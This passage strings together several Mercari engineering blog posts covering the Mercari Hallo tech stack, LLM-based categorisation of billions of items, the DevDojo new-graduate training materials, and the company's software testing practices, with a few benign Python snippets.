In addition to these points, the low startup cost is generally considered to be another advantage of PostgreSQL. For Mercari Hallo, we didn’t particularly take this into consideration since we were expecting a large number of users from the start, but I imagine the startup cost is important for many new services.

ORM

We use Ent for object-relational mapping (ORM). Ent is a powerful ORM framework for Go. It’s been used in a number of other places within Mercari Group, so we decided to use it for Mercari Hallo as well. It uses a code-first approach and has advanced query generation features, so it enables us to efficiently manipulate the database through Go.

In many cases, using ORM makes it difficult to write optimized and flexible queries, but at Mercari Hallo, our API is generally made up of very simple queries. This does mean that sometimes the number of queries gets large, but having it all be easy to understand and easy to implement is a huge plus. Now, you may be wondering what the performance is like if we have a large number of queries, but read processing scales just fine if we increase the number of read replicas, and unless the API is accessed at a seriously high frequency, having a slightly high number of queries won’t cause problems as long as you use indexes appropriately. Simple queries also make indexing easier. In reality, we haven’t had any major database performance problems for Mercari Hallo.

Database migration

We use Atlas for database migration. Ent also has an auto-migration feature and automatically applies DDL for the differences, but Ent’s auto-migration by itself often doesn’t meet the requirements once it’s time to actually start operating the service, so we generally stick to Atlas for management. (We have Ent’s auto-migration turned off in the production environment.) Atlas connects with Ent and automatically generates schema differences, among other powerful features, enabling efficient migration work. We also use Atlas for some migration work in DML.

GraphQL

We use GraphQL for communication between the backend and the frontend, including the mobile app. GraphQL is a modern choice for API development, and is used in many services around the world. It enables the service to dynamically control the data that’s fetched on the frontend, so even if the frontend specs change, you don’t necessarily have to make changes on the backend side. You can also nest queries, so the frontend can fetch most of the data needed for a screen with one API call, reducing unnecessary API calls. Also, the interfaces are defined by schemas with a static type system, enabling precise data exchange between the backend and the frontend. It’s helpful that the IDE/editor’s completion features tend to be effective as well.

gqlgen

On the backend, we use the Go GraphQL server implementation gqlgen. It’s simple, yet it has all the features we need; it has a low learning cost and is easy to use.

gqlgen is a schema-first framework and generally involves defining queries/mutations in one schema file, so Mercari Hallo has all of its queries and mutations collected in one schema file. This does mean that the file has gotten very long and sometimes feels a bit hard to use, but we take steps to make it as easy to maintain as possible, such as by using graphql-eslint to automatically clean up the file and sort types/queries/mutations alphabetically.

There are many benefits to having schemas all in one file. It’s easy to see everything in one place and automatically generate code, and when we want to show Mercari Hallo’s API to other teams, we can just show them the one file.

One other plus is that it has a simple and easy-to-use playground. With a playground, you can actually test the GraphQL queries/mutations you write. It will automatically complete input for you and generate API references (documents) for queries/mutations. This makes life so much easier and is very helpful when debugging and testing. With gqlgen, it’s easy to set up a playground without having to go through any complex configuration.

That said—and this isn’t about gqlgen specifically, but—with GraphQL server implementations, you have to be careful of the N+1 problem. Because of this, the learning cost and implementation cost is a little higher compared to REST, for example, but I don’t think this is too significant of a drawback when using GraphQL. This problem is usually addressed by using dataloaders, and Mercari Hallo uses graph-gophers/dataloader.

It’s also worth noting that protocol buffers (gRPC) are widely used as a protocol within Mercari Group, and they have excellent functionality. But in my opinion, when building a general web service, GraphQL is overall easier to use as a communication protocol between the frontend and the backend. (Though of course, this depends on the kind of service you’re building.)

REST tends to be brought up as an alternative, but in this day and age, I don’t think there are any benefits to choosing it unless you have a clear reason to.

React / TypeScript / Next.js

Mercari Hallo also uses a web-based frontend. The Work tab within the Mercari app uses WebView, and the management screen for partner businesses, intended for desktop use, is also web-based.

The Work tab within the Mercari app and the partner business management screen

We decided on React right away. Vue was also suggested as an option because it’s used in other projects within Mercari Group, but everyone on the initial development team was familiar with React, and it had all the features we needed for the service, so we figured that it would make development more efficient. We also thought that, given industry trends and the talent pool, React would provide us with an advantage on the hiring front.

The decision to use TypeScript was also a no-brainer. These days, static typing is basically a requirement for frontend development, and it offers many benefits for efficient development. It may be a bit more difficult than JavaScript, but there’s so much information out there to reference, so this shouldn’t be much of a problem for teams with a certain level of knowledge and experience.

We decided to use Next.js because of past experience using it within Mercari Group, how easy it is to use, the fact that it’s based on React, and its high performance.

The Work tab is right on the Mercari app, which demands a high-quality user experience. This means that display speed is crucial. We haven’t yet made full use of Next.js’s capabilities, but it offers flexible configuration for performance improvement, so we plan to leverage this as necessary going forward.

We use Apollo Client as our GraphQL client. Apollo Client is a popular web frontend framework and has excellent functionality, enabling efficient development. We chose it because it’s been used with Mercari Group in the past. We also use React hooks to integrate with React.

Flutter / Dart

In addition to the tab within the Mercari app, Mercari Hallo also has a standalone mobile app for iOS and Android. (You can find it by searching for メルカリハロ on the App Store or the Google Play Store!)

The standalone Mercari Hallo app

We use Flutter and Dart as the base for this app. We also considered the following options at the start of development:

iOS/Android native (Swift/Kotlin)
React Native
WebView-based app

The decision of what technology to use for the mobile app took more time than for the web frontend. Each of the choices had around the same amount of pros and cons, and the first two in particular were the subject of widely varying opinions from different team members. The discussions had to involve stakeholders from across the group, not just the Mercari Hallo team, so it was difficult to come to a final decision. The discussions mainly revolved around the following points:

Development cost
Proficiency level of the team
Performance
Internal resource allocation
Richness of the ecosystem, including third-party libraries
Ease of use
Expertise within Mercari Group

Of these, development cost drew the most attention. We didn’t have many engineers on the team at the beginning, but given the state of the market, we needed to release quickly. Developing native apps for both iOS and Android would have nearly twice the development cost, and there’s no guarantee we would be able to release on both platforms at the same time. The team really wanted to release the standalone mobile app on both iOS and Android at the same time, so we felt that developing native apps would be too risky timeline-wise.

On the other hand, the Mercari app (as opposed to the Mercari Hallo app) is implemented as a native app for iOS and Android. This meant that internally, iOS/Android native development had a much higher standing in terms of resource allocation. Of course, outside of Mercari, there are many people who can develop in Swift and Kotlin, too. But as I’ve already mentioned, we didn’t have many engineers on the team at first, and due to various circumstances we had no guarantee we would be able to get engineers even from other teams within the company. (Similarly, the US version of Mercari is implemented using React Native, so React Native also had more support in terms of expertise.)

Some stakeholders also voiced concerns regarding performance. There’s no arguing that iOS and Android native apps are the best option in terms of performance. There were concerns that even if we used a cross-platform framework like Flutter now, we would eventually have to rebuild the apps natively, but we decided that for now, launching the service in a reasonable timeframe and getting it out there to users was more important than optimal performance. Thankfully, given the nature of the service, there aren’t many cases in which we would need to maximize performance on iOS/Android anyway. It’s also worth pointing out that the Mercari app was rebuilt from scratch around four years after it launched. With this experience under our belts, we decided that it was more important to get the service on track now and if necessary, switch to iOS/Android native apps a few years down the line.

Eventually, after analyzing all of these discussion points, we decided that Flutter seemed like the best match for Mercari Hallo.

We don’t know for sure that this will turn out to have been the right choice for the Mercari Hallo service, or from the perspective of Mercari Group as a whole. But at least right now, it feels well-balanced in terms of development cost and performance, so I think it was an appropriate decision.

Conclusion

So, that was a quick introduction to the tech stack and architecture we use for Mercari Hallo, and the process we went through to choose it.

Selecting the right technology when launching a new service is really difficult; the decisions need to take into account many different perspectives in order to make sure the business succeeds. It’s also a serious responsibility, since in many cases it’s near impossible to change the technology after you’ve started. At the same time, I think many engineers find this process fun and worthwhile.

There’s no one “right” answer, since the basis for these decisions depends on the scale and conditions of the company, but I hope this example of how we did it for Mercari Hallo is a helpful reference for anyone looking to start a new service!

Links

Series feature: Mercari Hallo, World!

Mercari is hiring! If you’re interested in Mercari Hallo development or in Mercari itself, we’d love to hear from you. See the links below for details.

LLM-based Approach to Large-scale Item Category Classification

Fri, 31 May 2024 16:26:40 GMT

Hello, I’m ML_Bear, an ML Engineer on Mercari’s Generative AI team.

In a previous article [1], I talked about improving Mercari’s item recommendations. In this article, I will be presenting a case study involving the categorization of over 3 billion items using large-scale language models (LLMs) and related technologies.

As the LLM boom was sparked by the appearance of ChatGPT, many people became aware that LLMs were used in conversations, but it’s also true that LLMs can be an extremely useful tool for solving various tasks due to their high level of thinking ability. On the other hand, their slow processing speed and high cost can be a barrier to their implementation in large-scale projects.

This article describes our efforts to overcome these challenges by applying various innovations, maximize the potential of LLMs and its peripheral technologies, and solve the problem of categorizing large-scale item data.

Challenge

Let me begin with a brief background of this project and the technical issues involved.
In 2024, Mercari renewed its category structure, revamping its hierarchical structure and significantly increasing the number of item categories. However, when the number of categories and their hierarchical structure are changed, it becomes necessary to change the item data associated with them as well.

Normally, item categorization uses machine learning models or rule-based models. In this case, however, it was not possible to create a classifier using machine learning because the "correct category in the new category structure" for past items was unknowable. In addition, because the number of categories was very large, it was also difficult to construct a rule-based model. This prompted us to see if we could utilize LLMs to address this issue.

Solution: Prediction algorithm in two-stage configuration with LLM and kNN

We responded to this issue by constructing a two-stage algorithm as follows.

Correctly predict the categories of some past items with ChatGPT 3.5 turbo (OpenAI API[2])
Create a category prediction model for past items using 1. as training data

Things would have been simpler if it was possible to predict everything with ChatGPT, but since Mercari’s past items exceed 3 billion [3], it was impossible to predict everything from the perspective of both processing time and API cost. Therefore, after some trial and error, we settled on this two-stage model configuration. (Classifying all items with ChatGPT 3.5 turbo would have resulted in a cost of approximately 1 million USD and an unrealistic processing time estimate of 1.9 years.)
The following is a brief description of the model. Details will be described in the "Points of Innovation" section, so we will keep the explanations simple here.

1. Predict some correct categories of past items with ChatGPT 3.5 turbo (OpenAI API)

First, we sampled several million previously listed items and asked ChatGPT 3.5 turbo to predict the "correct category in the new category structure" for that item. Specifically, we created about 10 candidates for the new category based on each item’s item name, item description, and original category name, and asked it to provide the correct answer from among those candidates.

2. Create a category prediction model for past items using 1. as training data

Next, we created a simple kNN model[4] using the dataset created in 1. as the correct answer data.
Specifically, first the embedding and the correct answer category of the item whose correct answer category was predicted in 1. were stored in a vector database. Then, based on the embedding of the item to be predicted, X similar items were extracted from the vector database, and the most frequent category of those X items was used as the correct category.

Embedding was calculated based on a concatenated string of each item’s item name, item description, metadata, and original category name. A more complex machine learning model was also considered, but a simple model was adopted because it performed satisfactorily.

Points of Innovation

Here are some of the innovations that we devised for this project, applied to the following points which I will explain one by one.

Usage of OSS Embedding model
Usage of Multi-GPU with the Sentence Transformers library
Voyager Vector DB for fast neighborhood search on CPU
Accelerated LLM prediction by using max_tokens and CoT
Usage of Numba/cuDF

1. Usage of OSS Embedding model

The second stage model (kNN) required the computation of the embeddings of items. Although it was possible to build a neural network on our own, it was confirmed that the OpenAI Embeddings API (text-embedding-ada-002) [5] would provide sufficient accuracy, so we initially decided to use this API.

However, when we made an estimate, we quickly realized that using the OpenAI Embeddings API for all items would be a bit challenging in terms of processing time and cost.
While looking at MTEB[6] and JapaneseEmbeddingEval[7], we noticed that there were many OSS models in languages other than English that were comparable to the OpenAI Embeddings API. We decided to use the OSS models because we found them to be as accurate as the OpenAI Embeddings API when we created our own evaluation dataset and tried them out.
According to the data as of October 2023 in the midst of this project, the following models were evaluated as highly accurate, and we ended up using intfloat/multilingual-e5-base due to its good balance of computational cost and accuracy. (MTEB rankings are constantly changing, so we believe that stronger models may be available as of April 2023.)

intfloat/multilingual-e5-large [8]
intfloat/multilingual-e5-base [9]
intfloat/multilingual-e5-small [10]
cl-nagoya/sup-simcse-ja-large [11]

Since there are very high-performance embedding models in OSS, we recommend that when doing a project that uses embedding, that you create a simple problem and see if there is a model with sufficient performance in OSS.

2. Usage of Multi-GPU with Sentence Transformers library

Although using the OSS model dramatically increased processing speed compared to the OpenAI Embeddings API, more improvements were needed to process billions of items.
Our issues would have been solved much more quickly if we had access to a powerful GPU such as the A100, but it was quite difficult to acquire such a powerful GPU as of November-December 2023 back when the project was launched, possibly due to the global GPU shortage. (It’s doubtful that the situation has changed much even now.)
We therefore decided to use multiple GPUs such as V100 and L4 in tandem to handle this problem. Fortunately, the Sentence-Transformers[12] library was very helpful because we could easily parallelize multiple GPUs with the following simple code.

from sentence_transformers import SentenceTransformer

def embed_multi_process(sentences):
    if 'intfloat' in self.model_name:
        sentences = ["query: " + b for b in sentences]
    model = SentenceTransformer(model_name)
    pool = model.start_multi_process_pool()
    embeddings = model.encode_multi_process(sentences, pool)
    model.stop_multi_process_pool(pool)

It would have been ideal if we could use as many powerful GPUs as we needed, but even in situations where this isn’t possible, we can speed up processing by making use of creative ideas. That’s why it is important to make the most of limited resources by utilizing libraries such as Sentence-Transformers.

3. Voyager Vector DB for fast neighborhood search on CPU

A vector database was required when using kNN. Although sampled, the training data held several million items, so it could not fit in the GPU’s memory. While this may have been solved by using a GPU with a large memory, such as an A100 80GB, the difficulty in obtaining such a powerful GPU hindered us from trying that option.
Around that time, we learned that Spotify’s Voyager[13] can run at high speed even with a CPU, so we tried it and were able to easily achieve a speed that was sufficient for practical use. Compared to embedding calculations, there was not that much effect on the time required for neighborhood search, so although we did not compare it with other items in the strict sense, we were satisfied at having been able to achieve sufficient speed.
Voyager did not have metadata management capabilities, so we had to write our own client, but we still believe it was a good choice overall.

4. Accelerated LLM prediction by using max_tokens and CoT

For this project, ChatGPT 4 was not available due to cost, so we had to use ChatGPT 3.5 turbo. ChatGPT 3.5 turbo is rather clever for the cost, but we were a little concerned about its accuracy. Therefore, we used Chain of Thoughts[14] to improve accuracy by having it generate explanations.
As you may already know, ChatGPT sometimes talks for a long time when asked to provide an explanation, leading to prolonged processing times. Therefore, we tried to shorten the processing time by using the max_tokens parameter to interrupt a long answer midway.

Since the JSON (of Function Calling) is broken when the answer is interrupted, it is necessary to either use llm.stream()of LangChain[15], or restore and parse the JSON yourself, which is a bit time-consuming. Although we have not done an exact comparison, we feel that the method we used strikes a good balance between reducing processing time and improving accuracy.

The following is a sample code for using LangChain’s llm.stream().

from langchain_openai import ChatOpenAI
from langchain_core.prompts import ChatPromptTemplate

from typing import Optional
from langchain_core.pydantic_v1 import BaseModel, Field

class ItemCategory(BaseModel):
    item_category_id: int = Field(None, description="Category ID predicted from product description")
    reason: Optional[str] = Field(None, description="Explain in detail why you selected this category ID")

system_prompt = """
Based on the product information given, predict the category of the product.
Please choose a product category from the list of candidates. Explain why you chose it.
"""
item_info = "(Include product data and potential new categories, etc.) "

llm = ChatOpenAI(
    model_name="gpt-3.5-turbo",
    max_tokens=25,
)
structured_llm = llm.with_structured_output(ItemCategory)
prompt = ChatPromptTemplate.from_messages(
    [
        ("system", system_prompt),
        ("human", "{item_info}"),
    ]
)
chain = prompt | structured_llm

#  Extract only the last element of streaming
# - Normally, if you terminate the answer with max_tokens, the json is broken and needs to be parsed. 
# - There is no need to parse json when answer is terminated by max_tokens 
#   since it always completes json when termination is executed in langchain stream.
for res in chain.stream({"item_info": item_info}):
    pass

print(res.json(ensure_ascii=False))  # res: ItemCategory
# {"item_category_id": 1, "reason": "The product name contains 'stuffed animal' "}

5. Usage of Numba/cuDF

Since processing speed is a concern even for minor processes when processing billions of items, all processing was accelerated with cuDF[16] and Numba[17] whenever possible.
Although I am not very good at writing Numba, when I showed the raw Python code to ChatGPT 4, it rewrote it for me, which greatly reduced my coding time.

Conclusion

ChatGPT has attracted a lot of attention for its frequent use in a conversational style, and its advanced thinking ability provides effortless solutions to tasks that were previously tedious or deemed impossible. In our project, ChatGPT helped us solve the tedious task of reclassifying a huge amount of item data into new categories within a short period of time.

We were also able to maximize results even with limited time and resources by making use of OSS Embedding models and multiple GPUs, adopting a vector database that enables fast neighborhood search, using ChatGPT to speed up prediction, and using Numba to accelerate processing.
I hope that this case study will demonstrate the potential of ChatGPT and other large-scale language models and will be helpful in future projects. We encourage you to utilize LLMs in a variety of situations and take on challenges that have been difficult to solve in the past.

Refs

Introducing the Materials and Videos of Mercari’s 2024 New Graduate Engineer Training “DevDojo” !

Fri, 31 May 2024 12:00:55 GMT

Hi! I’m @yuki.t from Mercari’s Engineering Office.

At Mercari, we value mechanisms and opportunities for members to learn from each other, aiming to create an organization where everyone can grow together while pursuing high standards.

One such mechanism is the "DevDojo" in-house technical training program. In this training program, volunteers from within the company hold sessions to explain the different technologies used at Mercari. They are held annually to coincide with new graduate engineers joining the company.

We have been releasing a portion of the training content externally through a Learning materials Website for a few years.

A variety of sessions were offered in April this year as part of our new graduate training and onboarding. This blog introduces some of this year’s sessions.
We have also started providing new content, that we’d love for you to check out..

What is DevDojo?

Onboarding for new graduate engineers consists of two parts: a general training program to learn business etiquette and other necessary skills for work, and a training program to learn technical knowledge related to product development.
You can read more about the entire new graduate training program in this blog.

We refer to the technical training as "DevDojo." As you may have guessed, the name "DevDojo" is a blend of the words "development" and "dojo" (the Japanese term for a place of training or learning, especially Judo or other martial arts).

At DevDojo, employees serve as instructors to provide training and onboarding on the technologies used within the company. New graduate engineers can learn a wide range of product-related technologies regardless of their assigned role or technical area.

We believe that to enhance products with passion, it is essential to understand not only one’s own technical expertise but also the product as a whole. We prioritize the implementation of training programs throughout the organization.

In addition, the training is open to any member of the company. Anyone can attend any session that interests them, regardless of their technical area or job duties.

Here is what we’re making public

The Learning materials Website enables us to make some of the sessions from the training offered at DevDojo available to the public.
This year, two new themed sessions have been added.

Both sessions are about perspectives and ideas that are important for members who are newly starting their engineering careers.

We are also updating and providing other content.
More than half of Mercari’s engineering organization is made up of employees hailing from outside of Japan, sessions are offered in either Japanese or English, with simultaneous interpretation provided.

Here is this year’s training content for Mercari Engineers!

Problem Solving

In this session, software engineering will be considered as pure problem solving, and the steps from problem recognition to solution will be explained, with reference to past projects.
This is the first content in the series written by a Principal Engineer.
Slide

Ship Code Faster

This session will cover the productivity metrics used by various tech companies, discuss development and engineering practices to reduce the time from development start to feature release. It will also provide tangible steps on career progression for engineers who are new to their careers.
Slide-English

Mercari Design Doc

This session teaches the basics of the design docs (also known as technical specifications) needed for product development. It also explains how to write a good design doc and how design docs are used at Mercari.
Slide-English

Mercari Quality Assurance

In Mercari’s fast-paced development cycle, Quality Assurance(QA) is critical to the success of the application. In this course, you will learn about Mercari’s QA team and what processes, tools, and techniques are used to quickly identify and solve issues.
Slide-English

Merpay Quality Assurance

This presentation will explain the concept and importance of Quality Assuarance(QA) at Merpay and how QA engineers are involved in the development process.
It will also introduce the efforts to ensure that not only the QA engineers but also everyone involved in the development focuses on quality.
Slide-English / Slide-Japanese

Mercari Incident Management

This session introduces incident management in Mercari and its best practices. It shares a complete incident journey, working through the three phases "before, during, and after the incident." It also covers how incident reviews are conducted and how the quality of retrospectives is enhanced throughout the company.
Slide-English

[Basic] Machine Learning

At Mercari, AI is used to offer unique features such as Mercari AI Assist. This session goes over the general concepts of machine learning (“ML”) as well as the fundamentals of AI and ML. It also introduces how ML is implemented at Mercari by using actual projects as case studies.
Slide-English

Mercari Mobile Development

Mercari’s mobile development workflow has established rules for release cycles and operational processes in order to improve the user-friendliness and how fast we can release new services. This session teaches the development cycle and process actually used in the development of Mercari’s mobile services.
Slide-English

Mercari Design System for Mobile

Design systems are something that Mercari is heavily focused on in the interest of providing our users with a sustainable and consistent user experience. In this session, we will explain the basics of design systems for mobile, and how we actually create and operate them at Mercari.
Slide-English

Auth Platform Onboarding

In order to securely communicate between services managed by the Mercari Group, authentication and authorization are inseparable. In this session, we will introduce the role and usage of access tokens as the foundation of this authentication infrastructure.
Slide-English

In closing

We encourage open collaboration, based on our culture of “Trust & Openness” and “Open Organization”.
Based on this idea, we provide new graduate engineers with training and onboarding by volunteer engineers within the company. We also aim to contribute to the entire industry by sharing organizational and technical information not only internally but also externally.
This year, we were able to add and publish sessions on two new themes, and the implementation and publication of the training involve the collaboration and effort of many engineers, team members, and related teams. We would like to thank all members for their contributions to DevDojo!

We will continue to update and publish the DevDojo series, so please look forward to it.

Lastly, Mercari Group is now actively hiring engineers! If you are at all interested, please don’t hesitate to reach out!

Open position – Engineering at Mercari

Mercari’s Adoption of Modern Testing Techniques

Thu, 25 Apr 2024 09:00:04 GMT

Introduction

Hello everyone! I’m @Udit, an Engineering Manager (QA) at Mercari.

In the ever-evolving landscape of software development, the role of software testing has become increasingly crucial. With the rapid adoption of agile and DevOps methodologies, the traditional approaches to testing have been challenged to keep up with the demands of today’s fast-paced development cycles. As a result, there has been a significant evolution in testing techniques, with a shift towards modern approaches that emphasize efficiency, scalability, and automation.

Mercari, a leading e-commerce platform, has adopted advanced testing techniques that have proven instrumental in enhancing the quality and reliability of its software products. In this blog post, we will delve into some of these advanced techniques, including advancements in API testing, frontend testing, dogfooding, release testing, and more. Through this exploration, we aim to highlight how Mercari’s innovative approach to testing has significantly contributed to the improvement of its software solutions’ quality.

Let’s dive deeper into some modern and cutting-edge testing techniques, one by one!

1. Shift-Left Testing

Shift-Left Testing involves moving testing activities earlier in the software development lifecycle, aiming to detect and address defects as soon as possible. This approach is crucial in Agile and DevOps methodologies for its benefits:

Reduced Costs: Early defect detection reduces expenses associated with fixing issues in later stages.
Higher Efficiency: Enables quicker identification and resolution of issues, leading to more efficient development cycles.
Higher Quality: Focuses on preventing defects early, resulting in higher overall software quality.
Competitive Advantage: Allows for faster and more reliable software delivery, giving a competitive edge in the market.

Examples include unit testing, integration testing, and code reviews, ensuring robust and high-quality software development. Additional practices such as dev/QA kickoff, developer self-check, and running sanity tests by developers further enhance our testing process.

2. Test Automation

Test automation is integral to modern software development, expediting testing processes and enabling faster feedback loops. This approach utilizes specialized tools and frameworks to automate test case execution, reducing reliance on manual intervention and enhancing testing efficiency.

At Mercari, we follow similar principles and practices in our test automation endeavors. This includes:

Consulting: Offering expert advice on developing tailored test automation strategies and implementing best practices.
Tool Selection: Aiding in selecting appropriate test automation tools and frameworks based on factors such as application type, technology stack, and team expertise. Examples include frameworks based on XCUITest, Playwright, and Jetpack Compose.
Automation Strategy and Planning: Developing comprehensive automation strategies aligned with business objectives and project requirements.
QE Framework and Platform: Implementing quality engineering frameworks and platforms to streamline test automation initiatives and ensure consistency across projects.
Test Case Development: Creating robust and maintainable test cases covering diverse functional and non-functional aspects of the application.
Execution and Maintenance: Establishing automated test execution pipelines and processes for continuous testing, alongside providing ongoing maintenance and optimization of test automation assets.

3. Continuous Testing

Continuous Testing is vital in our software development process at Mercari, seamlessly integrating into our CI/CD pipelines. It ensures quality across the software delivery process, automating test executions from code commit to deployment. The benefits are significant, including faster release cycles, reduced risk of defects in production, and increased confidence in code changes. By automating test execution, teams receive timely feedback on code quality, allowing them to address issues early in the development process. Here are some key aspects of Continuous Testing:

Continuous Testing is seamlessly integrated into our CI/CD pipelines.
It ensures quality at every stage of the software delivery process.
Benefits include faster release cycles and reduced risk of defects in production.
Continuous Testing fosters confidence in code changes and prevents costly downtime.
By automating test execution, our teams gain timely feedback on code quality.

4. API Testing

API Testing, integral to Mercari’s software quality assurance, ensures the functionality, reliability, and performance of APIs, crucial for modern software applications. Through rigorous testing, teams validate APIs to function seamlessly, accurately handle diverse requests, and excel under varying conditions. Here’s an in-depth exploration of API Testing:

Importance: API testing is crucial for verifying that APIs meet their functional requirements, adhere to industry standards, and interact seamlessly with other components of the software ecosystem.
Tools and Techniques: Various tools and techniques are available for API testing, including Postman, REST Assured, and Swagger. These tools provide functionalities for creating, managing, and executing API tests efficiently.
Company Examples: Within our company, we commonly use Jest and Typescript-based frameworks for API testing, providing robust features and ensuring comprehensive test coverage. Additionally, Go-based frameworks are also utilized, further enhancing our testing capabilities.
Testing Scenarios: API testing encompasses a wide range of scenarios, including endpoint validation, data integrity checks, functional testing, and handling error responses. By simulating different types of requests and assessing API responses, teams can identify and address potential issues before they impact end-users.

API Testing is integral to Mercari’s software testing strategy, ensuring APIs function optimally and integrate seamlessly within the software ecosystem.

5. Frontend Testing

Frontend Testing, pivotal for Mercari’s user-centric approach, ensures a seamless and intuitive experience across various devices and platforms. By rigorously testing frontend components, teams identify and resolve issues related to usability and performance. Here’s a closer look at frontend testing:

Significance: Frontend testing plays a crucial role in validating the functionality and appearance of user interfaces, ensuring that they meet design specifications and user expectations. By conducting thorough frontend testing, teams can detect and address issues early in the development process, minimizing the risk of defects reaching production.
Frameworks and Tools: Several frontend testing frameworks and tools are available to facilitate the testing process. Examples include XCUITest for testing iOS applications, Playwright for cross-browser Web testing and automation, and Jetpack Compose UI for Android UI testing. These tools provide developers and QA engineers with the necessary capabilities to write, execute, and maintain frontend tests efficiently.
Testing Scenarios: Frontend testing encompasses a variety of scenarios, including UI validation, cross-browser testing, and end-to-end (E2E) testing. UI validation involves verifying that user interfaces render correctly and display the expected content and elements. Cross-browser testing ensures that web applications function consistently across different browsers and devices, while E2E testing involves testing the entire application workflow from start to finish, simulating real user interactions and scenarios.

By leveraging frontend testing frameworks and tools and embracing a holistic testing approach, teams at Mercari bolster the quality and dependability of their frontend components, culminating in a seamless and delightful user experience for customers.

6. Exploratory Testing

Exploratory Testing is a dynamic and creative approach to software testing embraced at Mercari, involving simultaneous test design and execution. It enables quality engineers to explore the application under test in real-time, uncovering defects and identifying usability issues that may elude scripted testing approaches. Here’s a closer look at exploratory testing:

Importance: Exploratory testing is essential for discovering hidden defects and usability issues that may not be covered by scripted test cases. Unlike traditional testing methods where test cases are predefined, exploratory testing encourages quality engineers to think outside the box, follow their intuition, and explore the application organically. This approach often leads to the discovery of critical defects and provides valuable insights into the user experience.
Complement to Scripted Testing: While scripted testing provides structure and repeatability, exploratory testing complements it by allowing quality engineers to investigate areas of the application that may not have been considered during test case design. By combining both approaches, teams can achieve comprehensive test coverage and uncover a wider range of issues.
Effective Practices: Effective exploratory testing requires careful planning and execution. Test charters, which outline the areas of the application to be explored, can help focus testing efforts and ensure thorough coverage. Timeboxing, or setting a specific time limit for testing sessions, helps prevent quality engineers from getting bogged down in details and encourages rapid exploration. Additionally, bug advocacy, where testers advocate for the importance of discovered defects, helps ensure that critical issues are addressed promptly.

By integrating exploratory testing into their testing strategies, teams at Mercari enhance the quality of their software, boost user satisfaction, and mitigate the risk of releasing defective products. This approach nurtures creativity and critical thinking among quality engineers, resulting in more robust and reliable applications.

7. Dogfooding

Dogfooding, also known as eating your own dog food or self-hosting, is a testing technique practiced at Mercari where developers and other stakeholders use their own software in real-world scenarios. Here’s a deeper dive into dogfooding testing:

Introduction: Dogfooding involves using the software products that you develop within your organization. Instead of relying solely on traditional testing methods, such as automated and manual testing, dogfooding encourages developers, quality engineers, and other team members to become end-users of their own products. This approach allows them to experience the software firsthand, identify usability issues, and gain valuable insights into its performance and functionality in real-world environments.
Benefits: Dogfooding offers several benefits to organizations, including the opportunity to gather immediate feedback from internal users, identify usability issues early in the development process, and validate the software’s functionality in real-world scenarios. By using their own products, teams can better understand the user experience, anticipate user needs, and make informed decisions about product improvements and enhancements. Additionally, dogfooding fosters a culture of continuous improvement and encourages collaboration and communication across different teams within the organization.
Examples and Best Practices: Many successful product companies have embraced dogfooding as a core testing strategy, where employees test pre-release versions of software internally to identify bugs and provide feedback before releasing them to the public. To implement dogfooding effectively, organizations should establish clear guidelines and procedures for using their own products, provide training and support to users, and prioritize feedback collection and analysis.

By incorporating dogfooding into our testing processes at Mercari, we enhance the quality of our software, increase user satisfaction, and accelerate innovation. This testing technique enables us to gain valuable insights into our products, identify issues early, and deliver better experiences to our customers.

8. Release Testing

Release testing plays a crucial role in ensuring the stability and reliability of software releases, especially in scenarios where multiple teams or companies contribute to a single application. This situation presents the challenge of coordinating changes from different entities, such as Mercari, Merpay, and Mercoin, all making modifications to our app and releasing simultaneously. Here’s a deeper exploration of release testing:

Introduction: Release testing is a critical phase in the software development lifecycle where the focus shifts from individual feature testing to validating the entire software product in preparation for deployment. Its primary goal is to ensure that the software meets the quality standards and functional requirements before it is released to end-users.
Release Testing Strategies: Release testing encompasses various strategies to verify the functionality, performance, and usability of the software. These strategies include:
- Smoke Testing: A preliminary round of testing aimed at quickly identifying major issues or showstoppers in the software build. It verifies that the basic functionalities of the application are working as expected.
- Critical Business Use Cases or Must Pass Scenarios: Verification of essential business workflows or must-pass scenarios that are crucial for the software’s core functionality and user experience.
- End-to-End (E2E) Testing: Inclusion of end-to-end testing scenarios that simulate real-world user interactions across multiple components or systems to validate the software’s behavior under various conditions.
- Regression Testing: A comprehensive testing approach that validates the existing functionality of the software after making changes or enhancements. It ensures that new updates do not adversely affect the existing features.
Automation: Automating release testing processes is essential for streamlining deployments and minimizing downtime. By automating repetitive tasks such as test execution, regression testing, and environment setup, organizations can accelerate the release cycle and improve overall efficiency. Automation also helps increase test coverage, reduce manual errors, and enable continuous integration and continuous delivery (CI/CD) pipelines.

By integrating robust release testing strategies and utilizing automation tools, we ensure the quality and reliability of its software releases. This proactive approach mitigates the risk of post-release issues and enhances customer satisfaction and trust in the product.

9. Production Testing

Production testing ensures software stability and performance in real-world environments, including sanity checks and basic performance evaluations.

Introduction: Production testing, also known as post-deployment testing, involves validating the functionality, performance, and reliability of software applications in a live production environment. Unlike pre-production testing, which occurs in testing or staging environments, production testing focuses on ensuring that the software performs as expected in real-world conditions.
Sanity Tests on Production: Sanity tests, also known as smoke tests, are conducted on the production environment to quickly verify essential functionalities and confirm that the system is operational after deployment. These tests typically cover critical use cases and key features to ensure that the basic functionality of the application is intact. Examples include user authentication, data retrieval, and basic navigation flows.
Basic Performance Checks: Production testing also includes basic performance checks to assess the responsiveness and stability of the application under typical user loads. These checks may involve monitoring key performance indicators (KPIs) such as response times, throughput, and error rates to identify any performance bottlenecks or degradation in system performance. While more comprehensive performance testing may occur earlier in the testing process, basic performance checks on production help ensure that the application meets acceptable performance standards in the live environment.
Importance: Production testing is crucial for detecting issues that may only manifest in a live production environment, such as configuration errors, compatibility issues, or unexpected interactions with other systems. By conducting thorough testing in the production environment, organizations can identify and resolve issues promptly, minimize downtime, and maintain a positive user experience.
Continuous Improvement: Production testing is not a one-time event but an ongoing process that continues throughout the software lifecycle. By continuously monitoring and testing the production environment, organizations can identify areas for improvement, implement enhancements, and deliver a reliable and high-quality user experience.

Implementing robust production testing practices at Mercari ensures that our software applications perform optimally in real-world scenarios, enhancing user satisfaction and maintaining business continuity.

10. Post-Release Support

Following the deployment of a software release, the focus shifts to post-release testing support, a critical phase aimed at ensuring the ongoing functionality, stability, and performance of the software. Here’s a more detailed breakdown of the key responsibilities involved:

Continuous Monitoring: Implementing robust monitoring solutions to track system performance, detect anomalies, and identify potential issues in real-time, including crash management activities to promptly address any unforeseen incidents.
Customer Inquiries Handling: Promptly addressing and resolving customer inquiries and concerns regarding the newly released software. This includes providing timely responses, offering solutions or workarounds, and ensuring customer satisfaction, along with collecting Voice of Customer (VoC) feedback to gather insights for future improvements.
